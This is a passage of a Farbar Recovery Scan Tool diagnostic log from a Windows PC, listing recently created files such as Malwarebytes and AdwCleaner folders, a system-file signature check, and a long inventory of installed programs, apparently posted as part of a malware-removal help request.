2014-09-12 15:13 - 2010-12-29 12:17 - 00003368 _____ () C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml
2014-09-12 15:13 - 2010-12-29 12:16 - 00006159 _____ () C:\Users\hesperia\Documents\failure notice.eml
2014-09-12 15:10 - 2010-12-29 12:16 - 00265897 _____ () C:\Users\hesperia\Documents\Invites.eml
2014-09-12 13:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-12 13:10 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-12 12:59 - 2014-09-09 14:40 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-12 12:58 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-12 09:49 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 19:41 - 2014-07-10 08:52 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-09-10 19:41 - 2010-11-03 09:24 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-10 19:12 - 2010-11-03 09:27 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2014-09-10 17:35 - 2014-09-10 17:34 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:35 - 2014-09-10 17:34 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-10 17:34 - 2011-04-29 10:16 - 00000000 ____D () C:\Program Files\Common Files\Adobe
2014-09-10 17:34 - 2010-07-07 10:08 - 00000000 ____D () C:\ProgramData\Adobe
2014-09-10 17:33 - 2010-12-31 22:20 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Adobe
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:15 - 2014-09-09 15:12 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 15:11 - 2014-09-09 14:33 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2011-04-29 10:03 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-09 14:35 - 2014-09-09 14:30 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:33 - 2014-09-08 18:32 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
2014-09-08 18:32 - 2011-09-21 14:51 - 405289750 _____ () C:\windows\MEMORY.DMP
2014-09-08 18:32 - 2011-04-29 09:59 - 00000000 ____D () C:\windows\Minidump
2014-09-07 10:07 - 2009-07-14 10:37 - 00000000 ____D () C:\windows\system32\NDF
2014-09-05 09:42 - 2014-09-10 18:08 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-05 09:38 - 2014-09-10 18:08 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-08-25 06:53 - 2012-04-24 14:35 - 00231584 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 10:25
 
==================== End Of Log ============================

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 10-09-2014
Ran by hesperia at 2014-09-13 09:49:20
Running from E:\
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adblock Plus for IE (32-bit) (HKLM\...\{DF0E7912-4A45-4B24-B472-E521C4D2C663}) (Version: 99.9 - Eyeo GmbH)
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.7.700.169 - Adobe Systems Incorporated)
Adobe Reader 9.5.5 (HKLM\...\{AC76BA86-7AD7-1033-7B44-A95000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Apple Application Support (HKLM\...\{EE6097DD-05F4-4178-9719-D3170BF098E8}) (Version: 1.4.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{308B6AEA-DE50-4666-996D-0FA461719D6B}) (Version: 3.3.0.69 - Apple Inc.)
Apple Software Update (HKLM\...\{C41300B9-185D-475E-BFEC-39EF732F19B1}) (Version: 2.1.2.120 - Apple Inc.)
Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver (HKLM\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.26 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{607CAF58-360F-8AB2-0E15-8B71B86E2390}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Bluetooth Stack for Windows by Toshiba (HKLM\...\{CEBB6BFB-D708-4F99-A633-BC2600E01EF6}) (Version: v7.10.10(T) - TOSHIBA CORPORATION)
Bonjour (HKLM\...\{2A981294-F14C-4F0F-9627-D793270922F8}) (Version: 2.0.4.0 - Apple Inc.)
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.35 - Broadcom Corporation)
BurnInTest v5.3 Pro (HKLM\...\BurnInTest_is1) (Version: 5.3 - Passmark Software)
Business Contact Manager for Outlook 2007 SP2 (HKLM\...\Business Contact Manager) (Version: 3.0.8619.1 - Microsoft Corporation)
Business Contact Manager for Outlook 2007 SP2 (Version: 3.0.8619.1 - Microsoft Corporation) Hidden
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon MP Navigator EX 3.1 (HKLM\...\MP Navigator EX 3.1) (Version:  - )
Canon MX870 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX870_series) (Version:  - )
Canon Speed Dial Utility (HKLM\...\Speed Dial Utility) (Version:  - )
Canon Utilities Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Utilities My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Utilities Solution Menu (HKLM\...\CanonSolutionMenu) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0315.1050.17562 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0315.1050.17562 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0315.1050.17562 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Czech (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Danish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Dutch (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help English (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Finnish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help French (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help German (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Greek (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Italian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Japanese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Korean (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Polish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Russian (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Spanish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Swedish (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Thai (Version: 2010.0315.1049.17562 - ATI) Hidden
CCC Help Turkish (Version: 2010.0315.1049.17562 - ATI) Hidden
ccc-core-static (Version: 2010.0315.1050.17562 - ATI) Hidden
ccc-utility (Version: 2010.0315.1050.17562 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.05 - Piriform)
Cisco EAP-FAST Module (HKLM\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.)
Conexant Audio Driver For AMD HDMI Codec (HKLM\...\CNXT_AUDIO_HDA_HDMI) (Version: 4.98.26.0 - Conexant)
Conexant HD Audio (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.119.0.61 - Conexant)
Corel WinDVD (HKLM\...\{5C1F18D2-F6B7-4242-B803-B5A78648185D}) (Version: 10.0.5.822 - Corel Inc.)
Definition Update for Microsoft Office 2010 (KB982726) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{650DE870-ECA3-4E63-8D77-778512BE5D4C}) (Version:  - Microsoft)
ESET Online Scanner v3 (HKLM\...\ESET Online Scanner) (Version:  - )
Intel® Management Engine Components (HKLM\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.8.0.1003 - Intel Corporation)
Intel® Turbo Boost Technology Driver (HKLM\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.01.01.1007 - Intel Corporation)
iTunes (HKLM\...\{881F5DE8-9367-4B81-A325-E91BBC6472F9}) (Version: 10.1.1.4 - Apple Inc.)
Java™ 6 Update 17 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216017FF}) (Version: 6.0.170 - Sun Microsystems, Inc.)
Junk Mail filter update (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LSI V92 MOH Application (HKLM\...\LTMOH) (Version:  - LSI Corporation)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6012.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft IntelliPoint 8.0 (HKLM\...\{00F93853-D9D3-4795-A89E-84CCBA0205C9}) (Version: 8.0.225.0 - Microsoft)
Microsoft Office 2003 Web Components (HKLM\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Converter Pack (HKLM\...\{6EECB283-E65F-40EF-86D3-D51BF02A8D43}) (Version: 11.0.0.0 - Microsoft Corporation - Office Resource Kit Group)
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Small Business Connectivity Components (HKLM\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Office Suite Activation Assistant (HKLM\...\{E50AE784-FABE-46DA-A1F8-7B6B56DCB22E}) (Version: 2.9 - Microsoft Corporation)
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2005 Express Edition (MSSMLBIZ) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Express Edition (SQLEXPRESS) (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Tools Express Edition (Version: 9.4.5000.00 - Microsoft Corporation) Hidden
Microsoft SQL Server Native Client (HKLM\...\{7670D32F-DAE6-4E49-8C8B-B3F08B5B1686}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{E7084B89-69E0-46B3-A118-8F99D06988CD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
MSVCRT (Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoScape (HKLM\...\PhotoScape) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
QuickTime (HKLM\...\{57752979-A1C9-4C02-856B-FBB27AC4E02C}) (Version: 7.69.80.9 - Apple Inc.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30111 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (Version:  - Microsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.0.8.1 - Synaptics Incorporated)
System Requirements Lab for Intel (HKLM\...\{CD41B576-4787-4D5C-95EE-24A4ABD89CD3}) (Version: 4.4.24.0 - Husdawg, LLC)
TeamViewer 6 (HKLM\...\TeamViewer 6) (Version: 6.0.17222 - TeamViewer GmbH)
TOSHIBA ConfigFree (HKLM\...\{607BE7BF-7C28-4ADB-A4A0-385962B901C3}) (Version: 8.0.28 - TOSHIBA Corporation)
TOSHIBA Disc Creator (HKLM\...\{5DA0E02F-970B-424B-BF41-513A5018E4C0}) (Version: 2.1.0.2 - TOSHIBA Corporation)
TOSHIBA eco Utility (HKLM\...\InstallShield_{53536479-DFB0-47ED-9D10-43F3708C222D}) (Version: 1.2.10.0 - TOSHIBA Corporation)
TOSHIBA eco Utility (Version: 1.2.10.0 - TOSHIBA Corporation) Hidden
TOSHIBA Hardware Setup (HKLM\...\{8E9CEA3B-EBD1-439C-A01D-830CB39613C6}) (Version: 2.00.06 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (HKLM\...\InstallShield_{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.0.6 - TOSHIBA Corporation)
TOSHIBA HDD/SSD Alert (Version: 3.1.0.6 - TOSHIBA Corporation) Hidden
TOSHIBA Media Controller (HKLM\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.80.3 - TOSHIBA CORPORATION)
TOSHIBA Media Controller Plug-in (HKLM\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.5.10 - TOSHIBA CORPORATION)
TOSHIBA Recovery Media Creator (HKLM\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.0.4 - TOSHIBA Corporation)
TOSHIBA Service Station (HKLM\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.9 - TOSHIBA)
TOSHIBA Speech System Applications (HKLM\...\{EE033C1F-443E-41EC-A0E2-559B539A4E4D}) (Version: 1.00.2518 - )
TOSHIBA Speech System SR Engine(U.S.) Version1.0 (HKLM\...\{008D69EB-70FF-46AB-9C75-924620DF191A}) (Version:  - )
TOSHIBA Speech System TTS Engine(U.S.) Version1.0 (HKLM\...\{3FBF6F99-8EC6-41B4-8527-0A32241B5496}) (Version:  - )
TOSHIBA Supervisor Password (HKLM\...\{073B89C3-BA88-41B5-965F-B35A88EAE838}) (Version: 2.00.03 - TOSHIBA Corporation)
TOSHIBA Value Added Package (HKLM\...\InstallShield_{FEDD27A0-B306-45EF-BF58-B527406B42C8}) (Version: 1.3.3 - TOSHIBA Corporation)
TOSHIBA Value Added Package (Version: 1.3.3 - TOSHIBA Corporation) Hidden
TOSHIBA Web Camera Application (HKLM\...\{5E6F6CF3-BACC-4144-868C-E14622C658F3}) (Version: 1.1.1.15 - TOSHIBA Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2533523) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2600217) (HKLM\...\{3C3901C5-3455-3E0A-A214-0B093A5070A6}.KB2600217) (Version: 1 - Microsoft Corporation)
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version:  - Microsoft)
Update for Microsoft Excel 2010 (KB2889836) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9179FC17-97A8-4D98-9E09-05720AF5D44E}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2494150) (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{3FCFD88F-4D13-4F38-8625-ABABEA7F61EA}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{35698CB7-AAA2-4577-B505-DBFF504AEF23}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version:  - Microsoft)
Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version:  - Microsoft)
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version:  - Microsoft)
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Call (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
Windows Live Communications Platform (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM\...\WinLiveSuite_Wave3) (Version: 14.0.8117.0416 - Microsoft Corporation)
Windows Live Essentials (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (HKLM\...\{0840B4D6-7DD1-4187-8523-E6FC0007EFB7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows Live Mail (Version: 14.0.8117.0416 - Microsoft Corporation) Hidden
